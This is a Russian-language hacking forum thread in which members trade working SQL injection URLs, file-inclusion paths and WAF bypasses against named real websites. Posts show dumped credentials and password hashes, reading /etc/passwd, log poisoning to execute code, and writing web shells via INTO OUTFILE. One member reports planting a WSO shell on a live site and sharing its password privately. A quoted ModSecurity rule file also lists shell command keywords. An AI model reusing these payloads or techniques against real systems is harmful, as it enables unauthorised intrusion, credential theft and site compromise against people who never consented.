o'clock said:
На сайте блинд скуль, но почему-то я не могу даже узнать версию бд, подскажите пожалуйста, что сделать чтоб узнать?

Code:
http://www.trudprava.ru/ibp.php?id=1%20and%20substring%28@@version,1,1%29= 5



Там нет скули.

Как можно раскрутить это? А то не пойму, что не так с синтаксисом. Коммент ток на одну строку что ли попадает?

http://www.fc-anji.ru/search/?search=123')))+AS+foo--+

вот есть скуль:


http://www.gov.ai/story.php?id=254+OR+(SELECT+COUNT(*)+FROM+(SELECT+ 1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT( MID(concat_ws(0x3a,VERSION(),user(),database()),1, 63),+FLOOR(RAND(0)*2)))


а вот как дальше раскрутить до отоброжение таблиц?, чето не получается...

winstrool said:
вот есть скуль:
а вот как дальше раскрутить до отоброжение таблиц?, чето не получается...


Там 4ая версия. А в 4ой версии нету information_schema. И еще про это написано в статьях.

winstrool said:
вот есть скуль:
а вот как дальше раскрутить до отоброжение таблиц?, чето не получается...



Все уже раскручено до тебя

http://goo.gl/bxvPO

Часто встречаю в теме sql-инъекций сообщения вида:


Данные по полям User,Password,File_priv из таблицы mysql.user:
-------
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
Dunkan:*6FD087AFBFB4C2995C3C0AD9D2D5FB582CDDBF46:Y
lovas:*47B11BE6589C2FDE355C316D9DB18DB0C06CC536:Y
admin:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y


Не тыкнете носом какие статьи прочитать, чтобы знать как это можно использовать?(Про залив шелла через скулю с файл-привом = Y знаю.)

Спасибо.

Что не так??


http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,group_concat%28concat_ws%280x3a 3a3a,user_name,pass%29+separator+0x0b%29,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35+from+forum_users+limit+0,20--

И почему в 4 версии не поддерживается table_schema?!

Как можно ещё?

table_schema

http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat %28table_name+separator+0x3a%29,3,4,5,6+from+infor mation_schema.tables+where+table_schema=0x636F6E63 6F7264345F6C6169746B6970657273--

Osstudio said:
И почему в 4 версии не поддерживается table_schema?!
Как можно ещё?
table_schema
http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat %28table_name+separator+0x3a%29,3,4,5,6+from+infor mation_schema.tables+where+table_schema=0x636F6E63 6F7264345F6C6169746B6970657273--


http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex(hex( concat(user_name,0x3a,user_pass))),3,4,5,6+from+us er--+

Osstudio said:
Что не так??




Code:
http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,concat(0x3a,count(*)),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35+from+forum_users+--+

пустая таблица

Osstudio said:
Что не так??


во первых синтаксетическая ошибка:

group_concat(concat_ws(0x3a3a3a,user_name,pass)+se parator+0x0b)

а должно быть:

group_concat(concat_ws(0x3a,user_name,pass)+separa tor+0x0b)

во вторых, там таблица пустая!!!

а вообще для примера по твоей уязвимости вот пример вывода:


http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,group_concat%28concat_ws(0x3a,r eg_ip)+separator+0x0b%29,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35+from+subscri be_emails+limit+0,20--

Osstudio said:
И почему в 4 версии не поддерживается table_schema?!
Как можно ещё?
table_schema
http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat %28table_name+separator+0x3a%29,3,4,5,6+from+infor mation_schema.tables+where+table_schema=0x636F6E63 6F7264345F6C6169746B6970657273--


тут маленькая поправочку про коментирую, правильно не table_schema , а information_schema

дальше, вот что говорит один из справочников:

цитата:

В MySQL версии 5.0 и выше есть база INFORMATION_SCHEMA. Это виртуальная база (не хранится в виде файлов, а формируется во время запуска сервера), содержащая метаданные баз данных, т.е. информацию о структуре баз данных. Доступна только для чтения.

полностью о information_schema сможешь прочитать здесь:


http://webew.ru/articles/200.webew


а об альтернативе запроса тебе уже постом выше привели пример:


Konqi said:
http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex(hex( concat(user_name,0x3a,user_pass))),3,4,5,6+from+us er--+


и еще, дополнительно, mysql 4

winstrool said:
во первых синтаксетическая ошибка:
group_concat(concat_ws(
0x3a3a3a
,user_name,pass)+separator+0x0b)
а должно быть:
group_concat(concat_ws(
0x3a
,user_name,pass)+separator+0x0b)


0x3a3a3a = :::

0x3a = :

Это не синтаксическая ошибка.

winstrool

Ты только вчера спрашивал как вывести список таблиц в 4ой версии,а сейчас уже отвечаешь на вопросы людей?

1. 0x3a3a3a - это синтаксическая ошибка? Открой свой любимый манул на MySQL и прочитай про эту ф-цию. Первым аргументом она приминает разделитель, можно написать concat_ws(':',a,b,c), но вариант не 100% т.к. много где используется magic_quotes, а 0x3a это : в кодировке HEX. Ты можешь туда что угодно написать, любой сделать разделитель.

2. К чему твоя "поправочка"? Человек все правильно выводит из таблицы information_schema при условии что table_schema (БД в которой находится таблица)=нужной ему.

Sql Injection

Такой вопрос.

Запрос типа: newsid=-1+union+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7,8

у меня проходит. Версия базы 5-я. Но дело в том, что на сайте стоит жесткая фильтрация и если вписать просто select без /*!*/ то выдает ошибку: "An appropriate representation of the requested resource / could not be found on this server.". Проблема такая. Когда я пишу слово table_name в любом запросе, то выходит опять ошибка: "An appropriate representation.... Как я понимаю, он фильтрует и слова определенные. Как обойти эту фильтрацию?

Ребят,возможно вопрос не в тему,но все же.Вот при раскрутки скули сильно ли палишься?надо юзать прокси или что нибудь еще?И что за это может быть?Помогите новичку)

Savage Boy said:
Такой вопрос.
Запрос типа: newsid=-1+union+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7,8
у меня проходит. Версия базы 5-я. Но дело в том, что на сайте стоит жесткая фильтрация и если вписать просто select без /*!*/ то выдает ошибку: "An appropriate representation of the requested resource / could not be found on this server.". Проблема такая. Когда я пишу слово table_name в любом запросе, то выходит опять ошибка: "An appropriate representation.... Как я понимаю, он фильтрует и слова определенные. Как обойти эту фильтрацию?


Это называется WAF. Ищи в гугле способы обхода WAF. Я не думаю, что фильтруется table_name. Скорее всего FROM, либо таблица INFORMATION_SCHEMA. Это можно обойти так же комментариями, но не всегда. Впиши просто в запрос: id=1+union \ select \ table_name \ from и т.д., чтобы узнать что из этого фильтруется.


MTV said:
Ребят,возможно вопрос не в тему,но все же.Вот при раскрутки скули сильно ли палишься?надо юзать прокси или что нибудь еще?И что за это может быть?Помогите новичку)


Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.

А на счет безопасности тебе в соответствующий раздел читать статьи.

Нашел local include. При попытке подняться из домашней директории юзверя и подценить какой-нибудь лог и т.д. Получаю: Method Not Implemented. GET to /index.php not supported.

В чем подвох? Как-то хитро настроено серверное ПО?

ta-kyn said:
Нашел local include. При попытке подняться из домашней директории юзверя и подценить какой-нибудь лог и т.д. Получаю:
Method Not Implemented. GET to /index.php not supported.
В чем подвох? Как-то хитро настроено серверное ПО?


На сервере стоит Mod Security, который не позволяет выполнять твои запросы.

ta-kyn

линк сюда скинь

Прошу:

http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00

Он на нулл-байт так реагирует, а не на "../"

ta-kyn said:
Прошу:
http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00



Там. три залитых шелла:

» http://www.libertarias.com/.htaccess HTTP 403 Forbidden

» http://www.libertarias.com/.htconfig HTTP 403 Forbidden

» http://www.libertarias.com/.htpasswd HTTP 403 Forbidden

» http://www.libertarias.com/.htaccess.1 HTTP 403 Forbidden

» http://www.libertarias.com/css/ HTTP 200 OK

» http://www.libertarias.com/img/ HTTP 200 OK

» http://www.libertarias.com/js/ HTTP 200 OK

» http://www.libertarias.com/stats/ HTTP 401 Authorization Required

» http://www.libertarias.com/temp/ HTTP 200 OK

» http://www.libertarias.com/c99.php HTTP 503 Service Unavailable

» http://www.libertarias.com/favicon.ico HTTP 200 OK

» http://www.libertarias.com/index.php HTTP 200 OK

» http://www.libertarias.com/r57.php HTTP 503 Service Unavailable

» http://www.libertarias.com/shell.php HTTP 503 Service Unavailable

FlaktW said:
Там. три залитых шелла:
» http://www.libertarias.com/c99.php HTTP 503 Service Unavailable
» http://www.libertarias.com/r57.php HTTP 503 Service Unavailable
» http://www.libertarias.com/shell.php HTTP 503 Service Unavailable


чё ж ты не заюзал эти шеллы, раз там они есть?)

это банальный случай, на сервере ids или аналог.

Tigger said:
Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.


Если сервер грамотно настроен, то попадают

+toxa+ said:
чё ж ты не заюзал эти шеллы, раз там они есть?)
это банальный случай, на сервере ids или аналог.


Попробуй сам заюзать:

http://www.libertarias.com/index.php?menu=3&op=5&autor=-110')+union+select+1,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),3,4,5,6+--+

5.1.39-log:libertarias:libertarias@apache2-jolly.hector.dreamhost.comc-linux-gnu

ta-kyn said:
Прошу:
http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00


прошу

http://www.libertarias.com/index.php?menu=4&op=../../../../etc//passwd%00&a=0

freezed said:
прошу
http://www.libertarias.com/index.php?menu=4&op=../../../../etc//passwd%00&a=0


=). Благодарю. А почему ..../../etc//passwd%00... ?

Tigger said:
Это называется WAF. Ищи в гугле способы обхода WAF. Я не думаю, что фильтруется table_name. Скорее всего FROM, либо таблица INFORMATION_SCHEMA. Это можно обойти так же комментариями, но не всегда. Впиши просто в запрос: id=1+union \ select \ table_name \ from и т.д., чтобы узнать что из этого фильтруется.
Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.
А на счет безопасности тебе в соответствующий раздел читать статьи.


Спасибо что активно помогаешь новичкам в вопросах. Прочитал про WAF, честно говоря первый раз слышу. Ну я решил ввести весь запрос в комментарии. Вышло так: -1+union+/*!select+1,version(),3,4,5,6,7,8*/ Все работает. При таком запросе: -1+union+/*!select+1,table_name,3,4,5,6,7,8+from+INFORMATION _SCHEMA.TABLES+limit+1,1*/ Он не выводит названия таблиц (лимит менял на разные). Даже 2 дня назад когда (даже не знав о WAF) комментировал запрос table_name и запрос проходил без ошибок, то он все равно не выдавал названия таблиц. Подскажи куда копать дальше.

ta-kyn said:
=). Благодарю. А почему ..../../etc
//
passwd%00... ?


просто потому, что /etc/passwd и еще часть файлов фильтруется, а другие можно и с одним слешем читать

Где можно скачать toolz'у, уде скомпиленную?!

Osstudio said:
Где можно скачать toolz'у, уде скомпиленную?!


Ты про Toolza от Pashela?

Она на Perl'e написана. Perl - это интерпретируемый язык, т.е. его не надо компилировать.

Скачивай ActivePerl и запускай. Или поищи в гугле "Как запускать Perl-скрипты"

ta-kyn said:
=). Благодарю. А почему ..../../etc
//
passwd%00... ?


Вывод /etc/passwd - это хорошо, но выполнение своего кода лучше.

1) Заливка шелла через соседей.

Через реверс-DNS находим 35 сайтов, расположенных на том же сервере, что и libertarias.com.

На одном из сайтов (ud-garithos.com) стоит phpBB 3.0.7 , в этой версии есть раскрытие путей, а шелл можно залить в картинке через аттач. К сожалению, версия оказалась пропатченная и путь узнать не удалось.

2) Внедрение кода в логи.

На сайте хостера (http://wiki.dreamhost.com/Finding_Causes_of_Heavy_Usage) узнаем, что логи хранятся в ~/logs/yourdomain.com/http/

Для внедрения кода в error.log выполняем запрос:


PHP:
GET /qwertyuiop HTTP/1.0

Host: www.libertarias.com

Referer:

В access.log:


PHP:
GET / HTTP/1.0

Host: www.libertarias.com

Referer:

Примеры:


PHP:
GET /qwertyuiop HTTP/1.0

Host: www.libertarias.com

Referer:



Code:
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/error.log%00&qwe=ls



PHP:
GET / HTTP/1.0

Host: www.libertarias.com

Referer:



Code:
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&qwe=ls

p.s.: не забывай про Mod Security


Code:
http://www.libertarias.com/?op=../../../../dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf%00&



PHP:
#Body sigs

SecRule REQUEST_HEADERS_NAMES"x_(?:key|file)\b"\

"capture,phase:2,t:none,t:lowercase,status:404,msg: 'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Backdoor access',id:390146,severit y:'2',logdata:'%{TX.0}'"

#c99 rootshell

SecRule REQUEST_URI"(?:\.php\?act=(chmod&f|cmd|ls|f&f)|cx529\.php|\.php\?(?:phpinfo|mtnf|p0k3r)|/shell[0-9]?\.php|/\.get\.php)"\

"capture,id:390146,rev:17,severity:2,msg:'Atomicorp .com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Command shell attack: PHP explo it shell attempting to run command',logdata:' %{TX.0}'"

#URI sigs

SecRule REQUEST_URI"/(?:(?:cse|cmd)\.(?:c|dat|gif|jpe?g|png|sh|txt|bmp| dat|txt|js|tmp|php(?:3|4|5)?|asp)|(?:terminatorX-?exp|[a-z](?:cmd|command)[0-9]?)\.(?:gif|jpe?g|txt|bmp|php(?:3|4|5)?|png)\?|cmd( ?:\.php(?:3|4|5)?|dat)|/(?:a|ijoo|oinc|s|sep|ipn|pro18|(php(?:3|4|5)?)?|sh ell|(?:o|0|p)wn(?:e|3)d|xpl|ssh2|too20|php(?:3|4|5 )?backdoor|dblib|sfdg2)\.(?:c|dat|gif|jpe?g|jpeg|p ng|sh|txt|bmp|dat|txt|js|htm|html|tmp|php(?:3|4|5) ?|asp)\?&(?:command|cmd)=|\.it/viewde|/(?:gif|jpe?g|ion|lala|shell|/ipn|php(?:3|4|5)?shell)\.(?:php?(?:3|4|5)?|tml)|to ol[12][0-9]?\.(?:ph(?:p(?:3|4|5)?|tml)|js)\?|therules25?\.(d( ao)t|gif|jpe?g|bmp|txt|png|asp)\?|\.dump/(bash|httpd)\.(?:txt|php?(?:3|4|5)?|gif|jpe?g|dat| bmp|png|\;| )|suntzu\.php?(?:3|4|5)?\?cmd|proxysx \.(?:gif|jpe?g|bmp|txt|asp|png)\?|shell.txt|scan1\ .0/scan/|(?:/bind|/juax|linuxdaybot)\.(gif|jpe?g|txt|bmp|png)|docLib/cmd\.asp)"\

"capture,id:390800,rev:3,severity:2,msg:'Atomicorp. com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Generic Attempt to run rootkit',logdata:'%{TX.0}'"

#generic payload

#if (isset($_GET['cmd'])) passthru(stripslashes($_GET['cmd']));

SecRule REQUEST_URI|ARGS|REQUEST_BODY"(?:rapidleech checker script|rapidleech plugmod - auto download|rapidleech|You are not allowed to leech from|alt=\"rapidleech plugmod|.*rapidleech|src=\"http://www\.rapidleech\.com/logo\.gif)"\

"phase:4,t:lowercase,ctl:auditLogParts=+E,auditlog, status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390900',rev:8,severity:'2'"

SecRule RESPONSE_HEADERS:WWW-Authenticate"basic realm.*rapidleech"\

"capture,phase:3,ctl:auditLogParts=+E,auditlog,stat us:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390903',rev:1,severity:'2',logda ta:'%{TX.0}'"

#WWW-Authenticate: Basic realm=\"RAPIDLEECH PLUGMOD

SecRule ARGS:cmd"(?:ls -|find /|mysqldump |ifconfig |php |echo |perl |killal l |kill |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |wge t |lwp-(?:download|request|mirror|rget) |uname |cvs |s vn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec | smbclient |t?ftp |ncftp |curl |telnet |g?cc |cpp |g\+\+ |/s?bin/(?:xterm|id|bash|sh|echo|kill|chmod|ch?sh|python|p erl|nasm|ping|mail|ssh|netstat|php|route))"\

"capture,id:390904,rev:4,severity:2,msg:'Atomicorp. com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Atte mpt',logdata:'%{TX.0}'"

SecRule ARGS:ev"^print [0-9];"\

"capture,id:390905,rev:1,severity:2,msg:'Atomicorp. com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Atte mpt',logdata:'%{TX.0}'"



SecRuleRemoveById 390144

SecRuleRemoveById 390145





SecRuleRemoveById 390148



SecRuleRemoveById 390149



SecRuleRemoveById 390144



SecRuleRemoveById 390149



SecRuleRemoveById 390149



SecRuleRemoveById 390149



SecRuleRemoveById 390149



SecRuleRemoveById 390147

SecRuleRemoveById 390149

SecRuleRemoveById 390147

SecRuleRemoveById 390149

SecRuleRemoveById 390149

SecRuleRemoveById 390149

SecRuleRemoveById 390149

SecRuleRemoveById 390147

SecRuleRemoveById 390149

SecRuleRemoveById 390149

SecRuleRemoveById 390149

SecRuleRemoveById 390149

SecRuleRemoveById 390149

SecRuleRemoveById 390148

SecRuleRemoveById 390801

SecRuleRemoveById 390148

SecRuleRemoveById 390145

SecRuleRemoveById 390902

2M_script Тчорт, как же я сам не догадался, посмотреть хостера - уже потерял надежду найти путь к логам.

Но это все равно бесполезно, ибо проклятый Mod Security удачно зарежет все system|passthru|shell_exec|exec ?

ta-kyn said:
2M_script Тчорт, как же я сам не догадался, посмотреть хостера - уже потерял надежду найти путь к логам.
Но это все равно бесполезно, ибо проклятый Mod Security удачно зарежет все system|passthru|shell_exec|exec ?


А зачем нужны они, ведь зная пути можно через ф-цию copy() в PHP залить.

Попробуй сначала в /tmp залить и проинклюдить его оттуда.

?op=../../../../../../../../tmp/shell

А логи возможно найти брутом путей и в твоем случае это бы удалось.

2Tigger я ручками перебирал. 1. Кстати, что можете посоветовать для автоперебора? (с поддержкой прокси желательно) 2. Странно что в мод_секьюрити не запрещена ф-ия copy()? 3. Для инклуда логов есть только 1-а попытка (при обращении получаю: Parse error: syntax error, unexpected '[' in /home/libertarias/logs/libertarias.com/http.620816/access.log)?

ta-kyn said:
2Tigger я ручками перебирал. 1. Кстати, что можете посоветовать для автоперебора? (с поддержкой прокси желательно) 2. Странно что в мод_секьюрити не запрещена ф-ия copy()? 3. Для инклуда логов есть только 1-а попытка (при обращении получаю: Parse error: syntax error, unexpected '[' in /home/libertarias/logs/libertarias.com/http.620816/access.log)?


1. Я использовал LIBrute от Voland'a, или же Toolza от Pashkela.

2. Ну а ты попробуй и узнаешь, хотя уже не узнешь.... Это обычная PHP ф-ция, вряд ли она запрещена на сервере.

3. После поста М_скрипта видать налетели и похерили логи, скорее всего забыв поставить ";" =\


M_script said:
Значит кто-то уже испортил. Подожди до завтра, логи каждый день начинаются заново.
p.s.: функция eval не запрещена.


С чего такое утверждение? Может ты знаешь информацию про данный сервер и поэтому так утверждаешь, но а вообще это бред. Везде по-разному. Порой логи с 2005 годов тянешь.

ta-kyn said:
(при обращении получаю: Parse error: syntax error, unexpected '[' in /home/libertarias/logs/libertarias.com/http.620816/access.log)?


Значит кто-то уже испортил. Подожди до завтра, логи каждый день начинаются заново.

p.s.: функция eval не запрещена.

Ясно, с чего вы взяли что логи хостер обнуляет каждый день? Хотя, очень хочется надеяться.. =)

Судя по 50_asl_rootkits.conf eval действительно должно работать...

А вообще, всем спасибо. Полезный топик.

ta-kyn said:
Ясно, с чего вы взяли что логи хостер обнуляет каждый день? Хотя, очень хочется надеяться.. =)
Судя по 50_asl_rootkits.conf eval действительно должно работать...
А вообще, всем спасибо. Полезный топик.


в практике мод секюрити очень легко обходится, например вместо system который фильтруется, юзаем print(``), или если фильтруются команды линуха, например слово wget, или ls -al

юзаем base64 энкод, да и вообще бывает обходится весь фильтр простым пост запросом

Ребят,а если пишет Hacking Attempt! это что значит?

MTV said:
Ребят,а если пишет Hacking Attempt! это что значит?


Ну а что такого удивительного?

Скорее всего фильтр обычный проверяющий параметры.

А что ты подставил? Кавычку? Попробуй самым обычным путем проверить на SQLi не юзаю кавычку. id=1+and+1=1 \ id=1+and+1=2

ta-kyn said:
Ясно, с чего вы взяли что логи хостер обнуляет каждый день? Хотя, очень хочется надеяться.. =)


Почитал вики.дримхост

привет

Как здесь обойти фильтрацию?

http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63+union+select+1,2+--+

FlaktW said:
Как здесь обойти фильтрацию?
http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63+union+select+1,2+--+


Даже если обойдешь, придется брутить имена таблиц

4.1.21:figura@localhost:figura

FlaktW said:
Как здесь обойти фильтрацию?
http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63+union+select+1,2+--+


Посимвольным перебором ASCII через AND или ORDER BY.

Какая БД тут, непонятно

http://www.kashmirlive.com/picturegallery.php?albumId=46+union+select+1,2,3,4 +--+

FlaktW said:
Какая БД тут, непонятно
http://www.kashmirlive.com/picturegallery.php?albumId=46+union+select+1,2,3,4 +--+


PostgreSQL 8.2.0

http://www.kashmirlive.com/picturegallery.php?albumId=46+and+1=0+union+select +null,version(),null,null+--+

Тоже Postgre:

http://www.maultsbytalent.com/models-and-talent.php?group=Female&type=Print&id=270'+union+select+version(),version(),version() ,version(),version(),version(),version(),version() ,version(),version(),version(),version(),version() ,version(),version(),version(),version(),version() ,version(),version(),version(),version(),version() ,version(),version(),version(),version()+--+&location=

вывести не удается!

Где ты там постгрейс увидел? это мюскл 5-ая ветка


Code:
http://www.maultsbytalent.com/models-and-talent.php?group=Female&type=Print&id=270'and(1=if(mid(version(),1,1)=5,1,0))--+

XAMEHA said:
Посимвольным перебором ASCII через AND или ORDER BY.


Там фильтруется select(юнион кстати тоже)

http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- - >> true

http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- select >> false

А без селекта ты ничего не добъешься, кроме вывода стандартных функций, ну узнаешь ты номер версии посимвольным перебором, и?


ta-kyn said:
2Tigger я ручками перебирал. 1. Кстати, что можете посоветовать для автоперебора? (с поддержкой прокси желательно) 2. Странно что в мод_секьюрити не запрещена ф-ия copy()? 3. Для инклуда логов есть только 1-а попытка (при обращении получаю: Parse error: syntax error, unexpected '[' in /home/libertarias/logs/libertarias.com/http.620816/access.log)?


http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&c=;

user agent:

Ну а дальше масса вариантов.

http://www.libertarias.com/wso.php

Пасс держи в пм по понятным причинам, также по понятным причинам пришлось запороть оба лога.

Cам инклюд в коде

index.php


PHP:
$op=$_GET['op'];

//...

if ($busqueda=="") {

include("op/$op.php");



Тоже пофикшен, по понятным причинам, т.к. автор вопроса получил и ответ и шелл в пм.

Shocked!


Code:
http://mctb.ru/forum?a=new'

А что с этим можно сделать?

SaNn said:
Shocked!

Code:
http://mctb.ru/forum?a=new'

А что с этим можно сделать?


Ну раскрытие путей точно есть, дальше без кода сразу не определить.

Я думаю тебе будет полезно(пробелы убрать):

http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=5,1,2)) >>> true

http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=4,1,2)) >>> false

http://mctb.ru/comments/(0)and(select*from(select(name_const(version(),3)) ,name_const(version(),3))a)

DIEZalok said:
Ну раскрытие путей точно есть, дальше без кода сразу не определить.
Я думаю тебе будет полезно(пробелы убрать):
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=5,1,2)) >>> true
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=4,1,2)) >>> false
http://mctb.ru/comments/(0)and(select*from(select(name_const(version(),3)) ,name_const(version(),3))a)


Слушай, а где можно почитать, про то, что ты сделал?

Вроде похоже на SQL инъекцию. Но хоть ты убей не могу понять, как она тут работает...

SaNn said:
Слушай а где можно почитать что ты сделал?


http://hacker-pro.net/showthread.php?t=3644

/thread19844.html (https://antichat.live/threads/19844/)

XAMEHA said:
http://hacker-pro.net/showthread.php?t=3644
/thread19844.html (https://antichat.live/threads/19844/)


Ок. Спрошу прямо:

В чем разница между проведением инъекции в запросах вида "*.php?id=1" и "*/comments/1".

Ни в чем это всего лишь mod_rewrite, т.е. ЧПУ (человеко понятные ссылки), по всей своей логике, скорее всего /comments/1 будет обрабатываться как .php?comments=1

Expl0ited said:
Ни в чем это всего лишь mod_rewrite, т.е. ЧПУ (человеко понятные ссылки), по всей своей логике, скорее всего /comments/1 будет обрабатываться как .php?comments=1


Но кроме этого, mod_rewrite может поддерживать передачу цифр, а так называемый обход ЧПУ позволит подставлять всё что угодно, так что надеться на это не нужно и фильтровать данные в любом случае. Яркий пример - DLink.

проблема в следуйщем не могу вывести нужные колонки

http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%2 9,4,5+from+plus_signup+--

в чем ошибка

kartes1984 said:
проблема в следуйщем не могу вывести нужные колонки
http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%2 9,4,5+from+plus_signup+--
в чем ошибка


http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,concat%28userid,0x3b,password%2 9,4,5+from+test_db.plus_signup+--

jeff;123456

ЧПУ (человеко понятные ссылки)


"У" ?

"урлы" - урл - URL

XAMEHA said:
Но кроме этого, mod_rewrite может поддерживать передачу цифр, а так называемый обход ЧПУ позволит подставлять всё что угодно, так что надеться на это не нужно и фильтровать данные в любом случае. Яркий пример - DLink.


ммм... как это: "mod_rewrite может поддерживать передачу цифр"?

mod_rewrite это модуль, который преобразует урл по правилам прописанными в директиве RewriteRule, и передаваться могут те символы, которые указаны в правиле.

так же может использоваться как mod_rewrite так и самопальный роутер на php

вариантов масса, и как таковой "обход ЧПУ", это очень смутный вид/метод атаки (если это можно так назвать)

получаемые данные, они на то и получаемые данные, что их можно модифицировать, и если их не фильтровать, безопасность сайта находится под угрозой, а каким способом они будут передаваться разницы нет, будь то _GET, _POST, _COOKIE, _SESSION, преобразованные из URL методами mod_rewrite или роутером.

не получается просмотреть таблицы

http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,3,group_concat%28table_name%29, 5+FROM+information_schema.tables+WHERE+table_schem a=0x7765626d6e675f70726f64756374

база данных webmng_product

Code:
http://www.gideons.com.my/news_process.php?id=(0)union/*!all*/select(1),2,3,group_concat(table_name,0x3a,column_ name+separator+0x3c62723e),(5)from(information_sch ema.columns)where(table_schema=0x7765626D6E675F707 26F6475637473)--+

kartes1984 said:
не получается просмотреть таблицы
http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,3,group_concat%28table_name%29, 5+FROM+information_schema.tables+WHERE+table_schem a=0x7765626d6e675f70726f64756374
база данных webmng_product


http://www.gideons.com.my/news_process.php?id=-1+union+select+1,2,group_concat(0x0b,table_name),4 ,5+from+information_schema.tables+where+table_sche ma=0x7765626d6e675f70726f6475637473+--+

gallery,

gallery_group,

news,

product_category,

products_detail

Подскажите, есть ли здесь инклуд?


http://www.worldbusinesslisting.org/chinese/index.php?cat=/etc//passwd&subcat=7392&page=3

FlaktW said:
Подскажите, есть ли здесь инклуд?


незнаю как там с инклудом, но скуль есть:


http://www.worldbusinesslisting.org/chinese/index.php?category=-39+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5--


worldbus_diego@192.168.2.7:5.0.92-community:worldbus_chinese

FlaktW said:
Подскажите, есть ли здесь инклуд?


Нету там инклюда.

А вообще определить есть ли инклюд или нету можно так:

Попробуй перед значением подставить: ./или /Если контент не изменился, то вполне возможно что инклюд.


PHP:




Если примерна такая картинка, то инклюд есть.

Это не беря в расчет всякие там филтры, которые могут обрезать "/" и т.д..

подскажите как правильно залить шелл:

делаю так


union+select+'%3C?php%20phpinfo();%20?%3E',2,3,4,5 ,6,7,8,9,0,11,12,13,14,15,16+INTO+OUTFILE+'/home/www/userfiles/1.php'--


создается файл:userfiles/1.php с содержимым


2 3 4 5 6 7 8 9 0 11 12 13 14 15 16


но как пхп не отоброжается, что можно сделать в такой ситуации?

winstrool said:
подскажите как правильно залить шелл:
делаю так
создается файл:userfiles/1.php с содержимым
но как пхп не отоброжается, что можно сделать в такой ситуации?


Залей форму для загрузки файлов.

winstrool said:
подскажите как правильно залить шелл:
делаю так
создается файл:userfiles/1.php с содержимым
но как пхп не отоброжается, что можно сделать в такой ситуации?


Открой сурс и посмотри. Скорее всего спецсимволы типа "

[QUOTE="Tigger"]
Tigger said:
Открой сурс и посмотри. Скорее всего спецсимволы типа "

winstrool said:
все символы записываются как надо, хтмл форму отоброжает а пхп не выполняет и отоброжает код пхп...


может что нить с .htaccess грамотное посоветуйте?

FlaktW

Какой смысл этого если у него PHP не интерпретируется?


winstrool said:
не получается, открывает как обычный тхт файл((


Не удивительно =\

winstrool

Скинь мне линк в ПМ, посмотрю.

winstrool said:
там php_value engine Off в файле .htaccess, возможноли через скуль переписать этот файл прова роот?


Ну так попробуй залить в другую директорию.

http://www.tvlab.com.ua/news/?id=-1+UNION+SELECT+1,2,group_concat(CPU_USER,0x3b,CPU_ SYSTEM),4,5+from+information_schema.profiling+--+

проблема с выводом данных

